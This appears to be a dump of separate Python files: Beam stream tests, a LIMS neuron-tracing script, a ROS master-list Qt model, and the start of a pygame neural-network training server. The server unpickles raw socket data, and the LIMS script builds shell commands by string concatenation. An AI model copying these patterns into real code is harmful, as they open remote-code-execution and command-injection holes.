stream = io.BufferedReader(filesystemio.DownloaderStream(downloader),
buffer_size)
# Verify that buffering works and is reading ahead.
self.assertEqual(stream.read(1), data[0])
self.assertEqual(downloader.last_read_size, buffer_size)
self.assertEqual(stream.read(), data[1:])
class TestUploaderStream(unittest.TestCase):
def test_file_attributes(self):
uploader = FakeUploader()
stream = filesystemio.UploaderStream(uploader)
self.assertEqual(stream.mode, 'w')
self.assertFalse(stream.readable())
self.assertTrue(stream.writable())
self.assertFalse(stream.seekable())
def test_write_empty(self):
uploader = FakeUploader()
stream = filesystemio.UploaderStream(uploader)
data = ''
stream.write(memoryview(data))
self.assertEqual(uploader.data, data)
def test_write(self):
data = 'abcde'
uploader = FakeUploader()
stream = filesystemio.UploaderStream(uploader)
# Unbuffered writes.
stream.write(memoryview(data[0]))
self.assertEqual(uploader.data[0], data[0])
self.assertEqual(uploader.last_write_size, 1)
stream.write(memoryview(data[1:]))
self.assertEqual(uploader.data, data)
self.assertEqual(uploader.last_write_size, len(data) - 1)
def test_write_buffered(self):
data = 'abcde'
uploader = FakeUploader()
buffer_size = 2
stream = io.BufferedWriter(filesystemio.UploaderStream(uploader),
buffer_size)
# Verify that buffering works: doesn't write to uploader until buffer is
# filled.
stream.write(data[0])
self.assertEqual(-1, uploader.last_write_size)
stream.write(data[1:])
stream.close()
self.assertEqual(data, uploader.data)
class TestPipeStream(unittest.TestCase):
def _read_and_verify(self, stream, expected, buffer_size):
data_list = []
bytes_read = 0
seen_last_block = False
while True:
data = stream.read(buffer_size)
self.assertLessEqual(len(data), buffer_size)
if len(data) < buffer_size:
# Test the constraint that the pipe stream returns less than the buffer
# size only when at the end of the stream.
if data:
self.assertFalse(seen_last_block)
seen_last_block = True
if not data:
break
data_list.append(data)
bytes_read += len(data)
self.assertEqual(stream.tell(), bytes_read)
self.assertEqual(''.join(data_list), expected)
def test_pipe_stream(self):
block_sizes = list(4**i for i in range(0, 12))
data_blocks = list(os.urandom(size) for size in block_sizes)
expected = ''.join(data_blocks)
buffer_sizes = [100001, 512 * 1024, 1024 * 1024]
for buffer_size in buffer_sizes:
parent_conn, child_conn = multiprocessing.Pipe()
stream = filesystemio.PipeStream(child_conn)
child_thread = threading.Thread(
target=self._read_and_verify, args=(stream, expected, buffer_size))
child_thread.start()
for data in data_blocks:
parent_conn.send_bytes(data)
parent_conn.close()
child_thread.join()
if __name__ == '__main__':
logging.getLogger().setLevel(logging.INFO)
unittest.main()
|
lims_image_tracing.py | __author__ = 'coriannaj'
###
import os
import subprocess, threading
import pandas as pd
import math
import re
from lims_access import get_mip
V3D = "/data/mat/xiaoxiaol/work/bin/bin_vaa3d_for_clusters/start_vaa3d.sh"
class Command(object):
def __init__(self, cmd):
self.cmd = cmd
self.process = None
def run(self, timeout):
def target():
#print 'Thread started'
self.process = subprocess.Popen(self.cmd, shell=True)
self.process.communicate()
#print 'Thread finished'
thread = threading.Thread(target=target)
thread.start()
thread.join(timeout)
if thread.is_alive():
print 'Terminating process'
print self.cmd
self.process.terminate()
thread.join()
#print self.process.returncode
def RUN_Vaa3d_Job(arguments):
# run in local python env
cmd = V3D + arguments
print cmd
command = Command(cmd)
command.run(timeout=60*10)
return
def profiling(input_img, input_swc, output_file, dilation_ratio = 3, flip = 0, invert = 0, cutoff_ratio=0.05, logfile=""):
arguments = " -x profiling -f profile_swc -i "+input_img+" "+input_swc+" -o "+output_file+" -p "+ str(dilation_ratio)+" "+str(flip)+" "+str(invert)+logfile
RUN_Vaa3d_Job(arguments)
return
def convert_img(input_img, output_img):
arguments = "/data/mat/zhi/idpImageReadWrite " + input_img + " " + output_img + " UCHAR 2"
print arguments
command = Command(arguments)
command.run(timeout=60*10)
return
def distanceFromRoot(root_x, root_y, root_z, x, y, z):
#use the following line for 3D distance
#return math.sqrt(pow((root_x - x), 2) + pow((root_y - y), 2) + pow((root_z - z), 2))
#use the following line for 2D distance - excluding the z-plane
return math.sqrt(pow((root_x - x), 2) + pow((root_y - y), 2))
def buildSpliceSWC(df, orig_df, max_dist):
assert(orig_df.at[0, 'pid'] == -1) #asserting it is root
df.loc[len(df)] = orig_df.loc[0]
root_x = orig_df.at[0, 'x']
root_y = orig_df.at[0, 'y']
root_z = orig_df.at[0, 'z']
nodes = len(orig_df.index)
for i in xrange(1, nodes):
dist = distanceFromRoot(root_x, root_y, root_z, orig_df.at[i, 'x'], orig_df.at[i, 'y'], orig_df.at[i, 'z'])
if dist < max_dist:
df.loc[len(df)] = orig_df.loc[i]
def spliceSWC(swc, write_path, splice_dist):
swc_identifier = swc.split('/')[-1]
print swc_identifier
cols = ['id', 'type', 'x', 'y', 'z', 'radius', 'pid']
fullswc_df = pd.read_csv(swc, delim_whitespace=True, comment='#', skiprows=1, names=cols)
spliceswc_df = pd.DataFrame(columns=cols)
buildSpliceSWC(spliceswc_df, fullswc_df, splice_dist)
swc_loc = os.path.join(write_path, swc_identifier.split('.swc')[0] + '_splice.swc')
spliceswc_df['id'] = spliceswc_df['id'].astype(dtype=int)
spliceswc_df['type'] = spliceswc_df['type'].astype(dtype=int)
spliceswc_df['pid'] = spliceswc_df['pid'].astype(dtype=int)
spliceswc_df.to_csv(swc_loc, sep=' ', header=False, index=False)
print 'swc stored : %s' %swc_loc
#id = spliceswc_df['id'].astype(dtype=int)
#type = spliceswc_df['type'].astype(dtype=int)
#x = spliceswc_df['x']
#y = spliceswc_df['y']
#z = spliceswc_df['z']
#r = spliceswc_df['radius']
#pid = spliceswc_df['pid'].astype(dtype=int)
#spliceswc_df = pd.concat([id, type, x, y, z, r, pid], axis=1)
print spliceswc_df
return swc_loc
#works specificially for the format set up in the gold folder
def runLIMS(data_path, write_path, overall_csv, splice_dist):
#create df table with headers
cols = ['image_id', 'CNR', 'SNR', 'dynamic_range', 'mean_fg', 'std_fg', 'mean_bg', 'std_bg', 'mean_tubularity', 'std_tubularity']
overall_profile = pd.DataFrame(columns=cols)
print data_path
dataimg_path = '/projects/mousecelltypes/vol1/'
for f in os.listdir(data_path):
#subfolder_path = os.path.join(data_DIR, dirName)
#subfolder_write_path = os.path.join(write_path, os.path.basename(dirName))
identifier = f.split('.swc')[0]
swc = os.path.join(data_path, f)
img = os.path.join(write_path, identifier) + '.tif'
print "swc is %s" %swc
profile_path = os.path.join(write_path, identifier + '_splice.csv')
series_id = re.search('\d*\.\d*\.\d*\.\d*', identifier)
print "identifier : %s series id: %s" %(identifier, series_id.group(0))
lims_img_path = get_mip(series_id.group(0))
convert_img(lims_img_path, img)
swc = spliceSWC(swc, write_path, splice_dist)
if swc != None and img != None:
profiling(img, swc, profile_path, 3, 1, 1)
print "Img: %s" % img
print "Swc: %s" % swc
print "Profile path: %s" % profile_path
#print "Log File: %s" % logfile
try:
profile_df = pd.read_csv(profile_path)
except IOError:
print "Image %s did not create a profile.csv" %swc
else:
#if file exists get data
# take from row 2 because only want dendrite data, type=3
stats = [identifier, profile_df.at[2,'cnr'], profile_df.at[2,'snr'], profile_df.at[2,'dynamic_range'], profile_df.at[2,'fg_mean'], profile_df.at[2,'fg_std'], profile_df.at[2,'bg_mean'], profile_df.at[2,'bg_std'], profile_df.at[2,'tubularity_mean'], profile_df.at[2,'tubularity_std']]
print stats
overall_profile.loc[len(overall_profile)]=stats
print "exporting csv"
print overall_profile
overall_profile.sort_values(by='image_id', inplace=True)
overall_profile.to_csv(os.path.join(write_path, overall_csv), index=False)
return
runLIMS('/local1/home/coriannaj/Desktop/NiviData/Version1','/data/mat/xiaoxiaol/data/NiviData/test', 'overall_splice.csv', 500) |
master_list_model.py | # Software License Agreement (BSD License)
#
# Copyright (c) 2012, Fraunhofer FKIE/US, Alexander Tiderko
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Fraunhofer nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import sys
from python_qt_binding.QtCore import QObject, QRect, Qt, Signal
from python_qt_binding.QtGui import QIcon, QImage, QStandardItem, QStandardItemModel
try:
from python_qt_binding.QtGui import QItemDelegate, QPushButton, QStyle
except Exception:
from python_qt_binding.QtWidgets import QItemDelegate, QPushButton, QStyle
from socket import getaddrinfo, AF_INET6
import threading
from fkie_master_discovery.common import get_hostname
from fkie_node_manager_daemon.common import isstring
import fkie_node_manager as nm
class MasterSyncButtonHelper(QObject):
'''
This is helper class to which contains a button and can emit signals. The
MasterSyncItem can not emit signals, but is used in QStandardModel.
'''
clicked = Signal(bool, str)
NOT_SYNC = 0
SWITCHED = 1
SYNC = 2
ICON_PREFIX = 'irondevil'
# ICON_PREFIX = 'crystal_clear'
def __init__(self, master):
QObject.__init__(self)
self.name = master.name
self._master = master
self._syncronized = MasterSyncButtonHelper.NOT_SYNC
self.ICONS = {MasterSyncButtonHelper.SYNC: nm.settings().icon("%s_sync.png" % self.ICON_PREFIX),
MasterSyncButtonHelper.NOT_SYNC: nm.settings().icon("%s_not_sync.png" % self.ICON_PREFIX),
MasterSyncButtonHelper.SWITCHED: nm.settings().icon("%s_start_sync.png" % self.ICON_PREFIX)}
self.widget = QPushButton()
# self.widget.setFlat(True)
self.widget.setIcon(self.ICONS[MasterSyncButtonHelper.NOT_SYNC])
self.widget.setMaximumSize(48, 48)
self.widget.setCheckable(True)
self.widget.clicked.connect(self.on_sync_clicked)
def on_sync_clicked(self, checked):
self.set_sync_state(MasterSyncButtonHelper.SWITCHED)
self.clicked.emit(checked, self._master.uri)
def master(self):
return self._master
def get_sync_state(self):
return self._syncronized
def set_sync_state(self, value):
if self._syncronized != value:
self._syncronized = value
if value in self.ICONS:
self.widget.setIcon(self.ICONS[value])
self.widget.setChecked(value == MasterSyncButtonHelper.SYNC)
def __eq__(self, item):
if isstring(item):
return self.master.name.lower() == item.lower()
elif not (item is None):
return self.master.name.lower() == item.master.name.lower()
return False
def __gt__(self, item):
if isstring(item):
return self.master.name.lower() > item.lower()
elif not (item is None):
return self.master.name.lower() > item.master.name.lower()
return False
class MasterSyncItem(QStandardItem):
'''
This object is needed to insert into the QStandardModel.
'''
ITEM_TYPE = QStandardItem.UserType + 35
def __init__(self, master):
QStandardItem.__init__(self)
self.name = master.name
self.button = MasterSyncButtonHelper(master)
self.parent_item = None
@property
def master(self):
return self.button.master()
@property
def synchronized(self):
return self.button.get_sync_state()
@synchronized.setter
def synchronized(self, value):
self.button.set_sync_state(value)
def __eq__(self, item):
return self.button == item
def __gt__(self, item):
return self.button > item
class MasterItem(QStandardItem):
'''
The master item stored in the master model. This class stores the master as
fkie_master_discovery.ROSMaster.
'''
ITEM_TYPE = QStandardItem.UserType + 34
def __init__(self, master, local=False, quality=None, parent=None):
self.name = ''.join([master.name, ' (localhost)']) if local else master.name
QStandardItem.__init__(self, '') # self.name)
self.parent_item = None
self._master = master
self.local = local
self.__quality = quality
self.descr = ''
self.ICONS = {'green': nm.settings().icon('stock_connect_green.png'),
'yellow': nm.settings().icon('stock_connect_yellow.png'),
'red': nm.settings().icon('stock_connect_red.png'),
'grey': nm.settings().icon('stock_connect.png'),
'disconnected': nm.settings().icon('stock_disconnect.png'),
'warning': nm.settings().icon('crystal_clear_warning.png'),
'clock_warn': nm.settings().icon('crystal_clear_xclock_fail.png')}
self.master_ip = None
self._master_errors = []
self._diagnostics = []
self._timediff = 0
self._threaded_get_ip()
self.updateNameView(master, quality, self)
def _threaded_get_ip(self):
thread = threading.Thread(target=self.__get_ip)
thread.daemon = True
thread.start()
def __get_ip(self):
try:
# get the IP of the master uri
result = getaddrinfo(get_hostname(self.master.uri), None)
ips = []
for r in result:
if r[0] == AF_INET6:
(_family, _socktype, _proto, _canonname, (ip, _port, _flow, _scope)) = r
else:
(_family, _socktype, _proto, _canonname, (ip, _port)) = r
if self.master_ip is None and ip:
self.master_ip = ''
if ip and ip not in ips:
self.master_ip = ' '.join([self.master_ip, ip])
ips.append(ip)
# self.updateNameView(self.master, self.quality, self)
except Exception:
import traceback
print(traceback.format_exc(1))
@property
def master(self):
return self._master
@master.setter
def master(self, value):
self._master = value
@property
def quality(self):
return self.__quality
@quality.setter
def quality(self, value):
if self.__quality != value:
self.__quality = value
self.updateMasterView(self.parent_item)
@property
def diagnostics(self):
return list(self._diagnostics)
@property
def master_errors(self):
return list(self._master_errors)
def updateMasterErrors(self, error_list):
self._master_errors = error_list
self.updateNameView(self.master, self.quality, self)
def add_master_error(self, msg):
if msg not in self._master_errors:
self._master_errors.append(msg)
self.updateNameView(self.master, self.quality, self)
def update_master_diagnostics(self, diagnostics):
del self._diagnostics[:]
for diagnostic in diagnostics.status:
if diagnostic.level > 0 and diagnostic.hardware_id == self._master.name:
self._diagnostics.append(diagnostic)
self.updateNameView(self.master, self.quality, self)
def updateTimeDiff(self, timediff):
self._timediff = timediff
self.updateNameView(self.master, self.quality, self)
def updateMasterView(self, parent):
'''
This method is called after the master state is changed to update the
representation of the master. The name will not be changed, but all other
data.
@param parent: Item which contains this master item. This is needed to update
other columns of this master.
@type parent: U{QtGui.QStandardItem<https://srinikom.github.io/pyside-docs/PySide/QtGui/QStandardItem.html>}
'''
if parent is not None:
# update the name decoration
child = parent.child(self.row(), MasterModel.COL_NAME)
if child is not None:
self.updateNameView(self.master, self.quality, child)
def updateNameView(self, master, quality, item):
'''
Updates the representation of the column contains the name state.
@param master: the topic data
@type master: fkie_master_discovery.TopicInfo
@param item: corresponding item in the model
@type item: L{TopicItem}
'''
tooltip = ''.join(['<html><body>'])
tooltip = ''.join([tooltip, '<h4>', master.uri, '</h4>'])
tooltip = ''.join([tooltip, '<dl>'])
tooltip = ''.join([tooltip, '<dt>', 'IP: ', str(self.master_ip), '</dt>'])
if master.online:
if quality is not None and quality != -1.:
tooltip = ''.join([tooltip, '<dt>', 'Quality: ', str(quality), ' %', '</dt>'])
else:
tooltip = ''.join([tooltip, '<dt>', 'Quality: not available</dt>'])
else:
tooltip = ''.join([tooltip, '<dt>', 'offline', '</dt>'])
tooltip = ''.join([tooltip, '</dl>'])
if item.descr:
tooltip = ''.join([tooltip, item.descr])
# update the icon
if master.online:
timediff = abs(self._timediff) > nm.settings().max_timediff
if self._master_errors or self._diagnostics or self.master_ip is None or timediff:
item.setIcon(self.ICONS['warning'])
if timediff:
tooltip = ''.join([tooltip, '<h4>', '<font color="#CC0000">Time difference to the host is about %.3f seconds!</font>' % self._timediff, '</h4>'])
item.setIcon(self.ICONS['clock_warn'])
if self.master_ip is None:
tooltip = ''.join([tooltip, '<h4>', '<font color="#CC0000">Host not reachable by name!!! The ROS topics may not by connected!!!</font>', '</h4>'])
if self._master_errors:
tooltip = ''.join([tooltip, '<h4>Errors reported by master_discovery:</h4>'])
for err in self._master_errors:
tooltip = ''.join([tooltip, '<dt><font color="#CC0000">%s</font></dt>' % err])
for diag in self._diagnostics:
tooltip = ''.join([tooltip, '<dt><font color="#CC0000">%s</font></dt>' % diag.message])
elif quality is not None and quality != -1.:
if quality > 30:
item.setIcon(self.ICONS['green'])
elif quality > 5:
item.setIcon(self.ICONS['yellow'])
else:
item.setIcon(self.ICONS['red'])
else:
item.setIcon(self.ICONS['grey'])
else:
item.setIcon(self.ICONS['disconnected'])
tooltip = ''.join([tooltip, '</body></html>'])
item.setToolTip(tooltip)
def update_description(self, descr):
self.descr = descr
self.updateNameView(self.master, self.quality, self)
@classmethod
def toHTML(cls, text):
'''
@param text: the text
@type text: C{str}
@return: the HTML representation of the name of the text
@rtype: C{str}
'''
ns, sep, name = text.rpartition('/')
result = ''
if sep:
result = ''.join(['<html><body>', '<span style="color:gray;">', str(ns), sep, '</span><b>', name, '</b></body></html>'])
else:
result = name
return result
def type(self):
return MasterItem.ITEM_TYPE
def __eq__(self, item):
if isstring(item):
return self.master.name.lower() == item.lower()
elif not (item is None):
return self.master.name.lower() == item.master.name.lower()
return False
def __gt__(self, item):
if isstring(item):
local = False
try:
local = nm.is_local(item)
except Exception:
pass
if self.local and not local: # local hosts are at the top
return False
return self.master.name.lower() > item.lower()
elif not (item is None):
if self.local and not item.local: # local hosts are at the top
return False
return self.master.name.lower() > item.master.name.lower()
return False
class MasterModel(QStandardItemModel):
'''
The model to manage the list with masters in ROS network.
'''
sync_start = Signal(str)
sync_stop = Signal(str)
header = [('Sync', 28), ('Name', -1)]
'''@ivar: the list with columns C{[(name, width), ...]}'''
COL_SYNC = 0
COL_NAME = 1
COL_SYNCBTN = 2
def __init__(self, local_masteruri=None):
'''
Creates a new list model.
'''
QStandardItemModel.__init__(self)
self.setColumnCount(len(MasterModel.header))
self._masteruri = local_masteruri
self.parent_view = None
self.pyqt_workaround = dict() # workaround for using with PyQt: store the python object to keep the defined attributes in the MasterItem subclass
def flags(self, index):
'''
@param index: parent of the list
@type index: U{QtCore.QModelIndex<https://srinikom.github.io/pyside-docs/PySide/QtCore/QModelIndex.html>}
@return: Flag or the requestet item
@rtype: U{QtCore.Qt.ItemFlag<https://srinikom.github.io/pyside-docs/PySide/QtCore/Qt.html>}
@see: U{http://www.pyside.org/docs/pyside-1.0.1/PySide/QtCore/Qt.html}
'''
if not index.isValid():
return Qt.NoItemFlags
# item = self.itemFromIndex(index)
# if item and item.master.online:
return Qt.ItemIsSelectable | Qt.ItemIsEnabled
# return Qt.NoItemFlags
def updateMaster(self, master):
'''
Updates the information of the ros master. If the ROS master not exists, it
will be added.
@param master: the ROS master to update
@type master: U{fkie_master_discovery.msg.ROSMaster<http://docs.ros.org/api/fkie_multimaster_msgs/html/msg/ROSMaster.html>}
'''
# remove master, if his name was changed but not the ROS master URI
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i)
if masterItem.master.uri == master.uri and masterItem.master.name != master.name:
root.removeRow(i)
try:
del self.pyqt_workaround[masterItem.master.name]
except Exception:
pass
break
# update or add a the item
root = self.invisibleRootItem()
doAddItem = True
is_local = nm.is_local(get_hostname(master.uri))
for index in range(root.rowCount()):
masterItem = root.child(index, self.COL_NAME)
if (masterItem == master.name):
# update item
masterItem.master = master
masterItem.updateMasterView(root)
doAddItem = False
break
elif (masterItem > master.name):
self.addRow(master, is_local, root, index)
doAddItem = False
break
if doAddItem:
self.addRow(master, is_local, root, -1)
def addRow(self, master, local, root, index):
'''
Creates the list of the items from master. This list is used for the
visualization of master data as a table row.
@param master: the master data
@type master: fkie_master_discovery.ROSMaster
@param local: whether the master is local or not
@type local: bool
@return: the list for the representation as a row
@rtype: C{[L{MasterItem} or U{QtGui.QStandardItem<https://srinikom.github.io/pyside-docs/PySide/QtGui/QStandardItem.html>}, ...]}
'''
items = []
sync_item = MasterSyncItem(master)
items.append(sync_item)
name_item = MasterItem(master, local)
items.append(name_item)
name_item.parent_item = root
self.pyqt_workaround[master.name] = items # workaround for using with PyQt: store the python object to keep the defined attributes in the MasterItem subclass
# add the items to the data model
if index > -1:
root.insertRow(index, items)
else:
root.appendRow(items)
# add the sync botton and connect the signals
if self.parent_view is not None:
newindex = index if index > -1 else root.rowCount() - 1
self.parent_view.setIndexWidget(self.index(newindex, self.COL_SYNC), sync_item.button.widget)
sync_item.button.clicked.connect(self.on_sync_clicked)
return items
def updateMasterStat(self, master, quality):
'''
Updates the information of the ros master.
@param master: the ROS master to update
@type master: C{str}
@param quality: the quality of the connection to master
@type quality: C{float}
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name in master:
masterItem.quality = quality
break
def setChecked(self, master, state):
'''
Set the master to checked state
@param master: the ROS master to update
@type master: C{str}
@param state: new state
@type state: C{bool}
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_SYNC)
if masterItem.master.name == master:
masterItem.synchronized = MasterSyncButtonHelper.SYNC if state else MasterSyncButtonHelper.NOT_SYNC
break
def removeMaster(self, master):
'''
Remove the master with given name.
@param master: the ROS master to add
@type master: C{str}
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name == master:
root.removeRow(i)
try:
del self.pyqt_workaround_sync[masterItem.master.name]
del self.pyqt_workaround_info[masterItem.master.name]
except Exception:
pass
break
def updateMasterErrors(self, master, errors):
'''
Updates the errors reported by master_discovery.
@param master: the ROS master to update
@type master: C{str}
@param errors: the list with errors
@type errors: C{[str]}
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name == master:
masterItem.updateMasterErrors(errors)
break
def add_master_error(self, master, msg):
'''
Add error to the error list.
:param str master: the ROS master to update
:param str msg: error message
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name == master:
masterItem.add_master_error(msg)
break
def update_master_diagnostic(self, master_name, diagnostics):
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name == master_name:
masterItem.update_master_diagnostics(diagnostics)
break
def updateTimeDiff(self, master, timediff):
'''
Updates the time difference reported by master_discovery.
@param master: the ROS master to update
@type master: C{str}
@param timediff: the time difference to the host
@type timediff: float
'''
root = self.invisibleRootItem()
for i in reversed(range(root.rowCount())):
masterItem = root.child(i, self.COL_NAME)
if masterItem.master.name == master:
masterItem.updateTimeDiff(timediff)
break
def update_description(self, master, descr):
'''
Updates the description of the master with given name.
@param master: the ROS master to add
@type master: C{str}
@param descr: the description of the master coded as HTML
@type descr: C{str}
'''
root = self.invisibleRootItem()
for i in range(root.rowCount()):
masterItem = root.child(i, self.COL_NAME)
if masterItem and masterItem.master.name == master:
masterItem.update_description(descr)
def on_sync_clicked(self, checked, masteruri):
if checked:
self.sync_start.emit(masteruri)
else:
self.sync_stop.emit(masteruri)
class MasterIconsDelegate(QItemDelegate):
def __init__(self, parent=None, *args):
QItemDelegate.__init__(self, parent, *args)
self._idx_icon = 1
self._hspacing = 2
self._vspacing = 4
self._icon_size = 0
self._enabled = True
self.IMAGES = {}
def _scale_icons(self, icon_size):
self._icon_size = icon_size
params = (self._icon_size, self._icon_size, Qt.IgnoreAspectRatio, Qt.SmoothTransformation)
self.IMAGES = {'green': nm.settings().image('stock_connect_green.png').scaled(*params),
'yellow': nm.settings().image('stock_connect_yellow.png').scaled(*params),
'red': nm.settings().image('stock_connect_red.png').scaled(*params),
'grey': nm.settings().image('stock_connect.png').scaled(*params),
'disconnected': nm.settings().image('stock_disconnect.png').scaled(*params),
'warning': nm.settings().image('crystal_clear_warning.png').scaled(*params),
'clock_warn': nm.settings().image('crystal_clear_xclock_fail.png').scaled(*params),
'cpu_warn': nm.settings().image('hight_load.png').scaled(*params),
'cpu_temp_warn': nm.settings().image('temperatur_warn.png').scaled(*params),
'hdd_warn': nm.settings().image('crystal_clear_hdd_warn.png').scaled(*params),
'net_warn': nm.settings().image('sekkyumu_net_warn.png').scaled(*params),
'mem_warn': nm.settings().image('mem_warn.png').scaled(*params)
}
def set_enabled(self, value):
self._enabled = value
def paint(self, painter, option, index):
# update the icon size and resize images if needed
if option.rect.height() - self._vspacing * 2 != self._icon_size:
self._icon_size = option.rect.height() - self._vspacing * 2
self._scale_icons(self._icon_size)
painter.save()
self._idx_icon = 1
item = index.model().itemFromIndex(index)
if option.state & QStyle.State_Selected:
painter.fillRect(option.rect, option.palette.highlight())
if isinstance(item, MasterItem):
tooltip = '<html><body>'
tooltip = '%s\n<h4>%s</h4>' % (tooltip, item.master.uri)
tooltip = '%s\n<dt>IP: %s</dt>' % (tooltip, str(item.master_ip))
if item.master.online:
if item.quality is not None and item.quality != -1.:
tooltip = '%s\n<dt>Quality: %.2f </dt>' % (tooltip, item.quality)
else:
tooltip = '%s\n<dt>Quality: not available</dt>' % (tooltip)
else:
tooltip = '%s\n<dt>offline</dt>' % (tooltip)
# update warnings
if item.master.online:
master_errors = item.master_errors
if master_errors or item.master_ip is None:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['warning'])
if item.master_ip is None:
tooltip = '%s\n<h4><font color="#CC0000">Host not reachable by name! The ROS topics may not by connected!</font></h4>' % (tooltip)
if master_errors:
tooltip = '%s\n<h4>Errors reported by master_discovery:</h4>' % (tooltip)
for err in master_errors:
tooltip = '%s\n<dt><font color="#CC0000">%s</font></dt>' % (tooltip, err)
elif self._enabled:
rect = self.calcDecorationRect(option.rect)
if item.quality is not None and item.quality != -1.:
if item.quality > 30:
painter.drawImage(rect, self.IMAGES['green'])
elif item.quality > 5:
painter.drawImage(rect, self.IMAGES['yellow'])
else:
painter.drawImage(rect, self.IMAGES['red'])
else:
painter.drawImage(rect, self.IMAGES['grey'])
# check for time difference
timediff = abs(item._timediff) > nm.settings().max_timediff
if timediff:
tooltip = '%s\n<h4><font color="#CC0000">Time difference to the host is about %.3f seconds!</font></h4>' % (tooltip, item._timediff)
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['clock_warn'])
else:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['disconnected'])
# update diagnostic warnings
for diag in item.diagnostics:
if diag.level > 0:
tooltip = '%s\n<dt><font color="#CC0000">%s</font></dt>' % (tooltip, diag.message.replace('>', '>').replace('<', '<'))
if 'Network Load' in diag.name:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['net_warn'])
if 'CPU Load' in diag.name:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['cpu_warn'])
if 'CPU Temperature' in diag.name:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['cpu_temp_warn'])
if 'Memory Usage' in diag.name:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['mem_warn'])
if 'HDD Usage' in diag.name:
rect = self.calcDecorationRect(option.rect)
painter.drawImage(rect, self.IMAGES['hdd_warn'])
# update description from robot description parameter
if item.descr:
tooltip = '%s\n%s' % (tooltip, item.descr)
# paint the name of the host
tooltip = '%s\n</body></html>' % (tooltip)
item.setToolTip(tooltip)
rect = self.calcDecorationRect(option.rect, image=False)
painter.drawText(rect, Qt.AlignVCenter, item.name)
painter.restore()
def calcDecorationRect(self, main_rect, image=True):
rect = QRect()
rect.setX(main_rect.x() + self._idx_icon + self._hspacing)
rect.setY(main_rect.y() + self._vspacing)
rect.setWidth(self._icon_size if image else main_rect.width() - self._idx_icon)
rect.setHeight(self._icon_size)
self._idx_icon += self._icon_size + self._hspacing
return rect
|
server.py | import socket
import asyncio
import os
import sys
import threading
import time
import nn
import ga
import pickle
from const import *
from pygame.locals import *
import pygame
import subprocess
from player import *
import game
from multiprocessing.pool import ThreadPool
import time
def listenCommunication(clientSocket):
global players
try:
playerReceived = clientSocket.recv(2048)
if len(playerReceived) != 0 :
try :
p = pickle.loads(playerReceived)
players.append(p)
except :
pass
clientSocket.close()
except Exception as inst:
print("exp : " + str(inst))
pass
def launchGame(name, score) :
subprocess.call('python3 game.py mode=training filename=score\\' + str(name) + '.json speed=20 score=' + (str(score) if score > 2000 else '2000'))
def main(args) :
global connections, s, players, bestPlayer, robotoFont, SCREEN, tAccept, gen, pendingThread
pygame.init()
FPSCLOCK = pygame.time.Clock()
SCREEN = pygame.display.set_mode((SCREENWIDTH, SCREENHEIGHT))
pygame.display.set_caption('Server')
robotoFont = pygame.font.SysFont("Arial", 14)
gen = 0
connections = []
players = []
bestPlayer = None
pendingThread = 0
print('launch')
tTrain = threading.Thread(target=train)
tTrain.start()
while True:
handleGameEvents()
if(not tTrain.isAlive()):
tTrain = threading.Thread(target=train)
tTrain.start()
# Background
SCREEN.fill((0,0,0))
# print(bestPlayer)
if bestPlayer != None :
showScore("BEST Input-Hidden", (10,0))
showScore(bestPlayer.brain.weight_ih, (10, 25))
showScore("BEST Hidden-Output", (10,50))
showScore(bestPlayer.brain.weight_ho, (10, 75))
showScore("Score", (10,100))
showScore(bestPlayer.score, (10, 125))
showScore(pendingThread, (10, SCREENHEIGHT - 50))
showScore(gen, (10, SCREENHEIGHT - 25))
pygame.display.update()
FPSCLOCK.tick(FPS)
def showScore(score, pos):
label = robotoFont.render(str(score), 1, (255,255,255))
SCREEN.blit(label, pos)
def handleGameEvents() :
for event in pygame.event.get():
# QUIT
if event.type == QUIT or (event.type == KEYDOWN and event.key == K_ESCAPE):
pygame.quit()
sys.exit()
def save(brain, name) :
json = brain.tojson()
with open(name, 'w') as file :
file.write(json)
def train() :
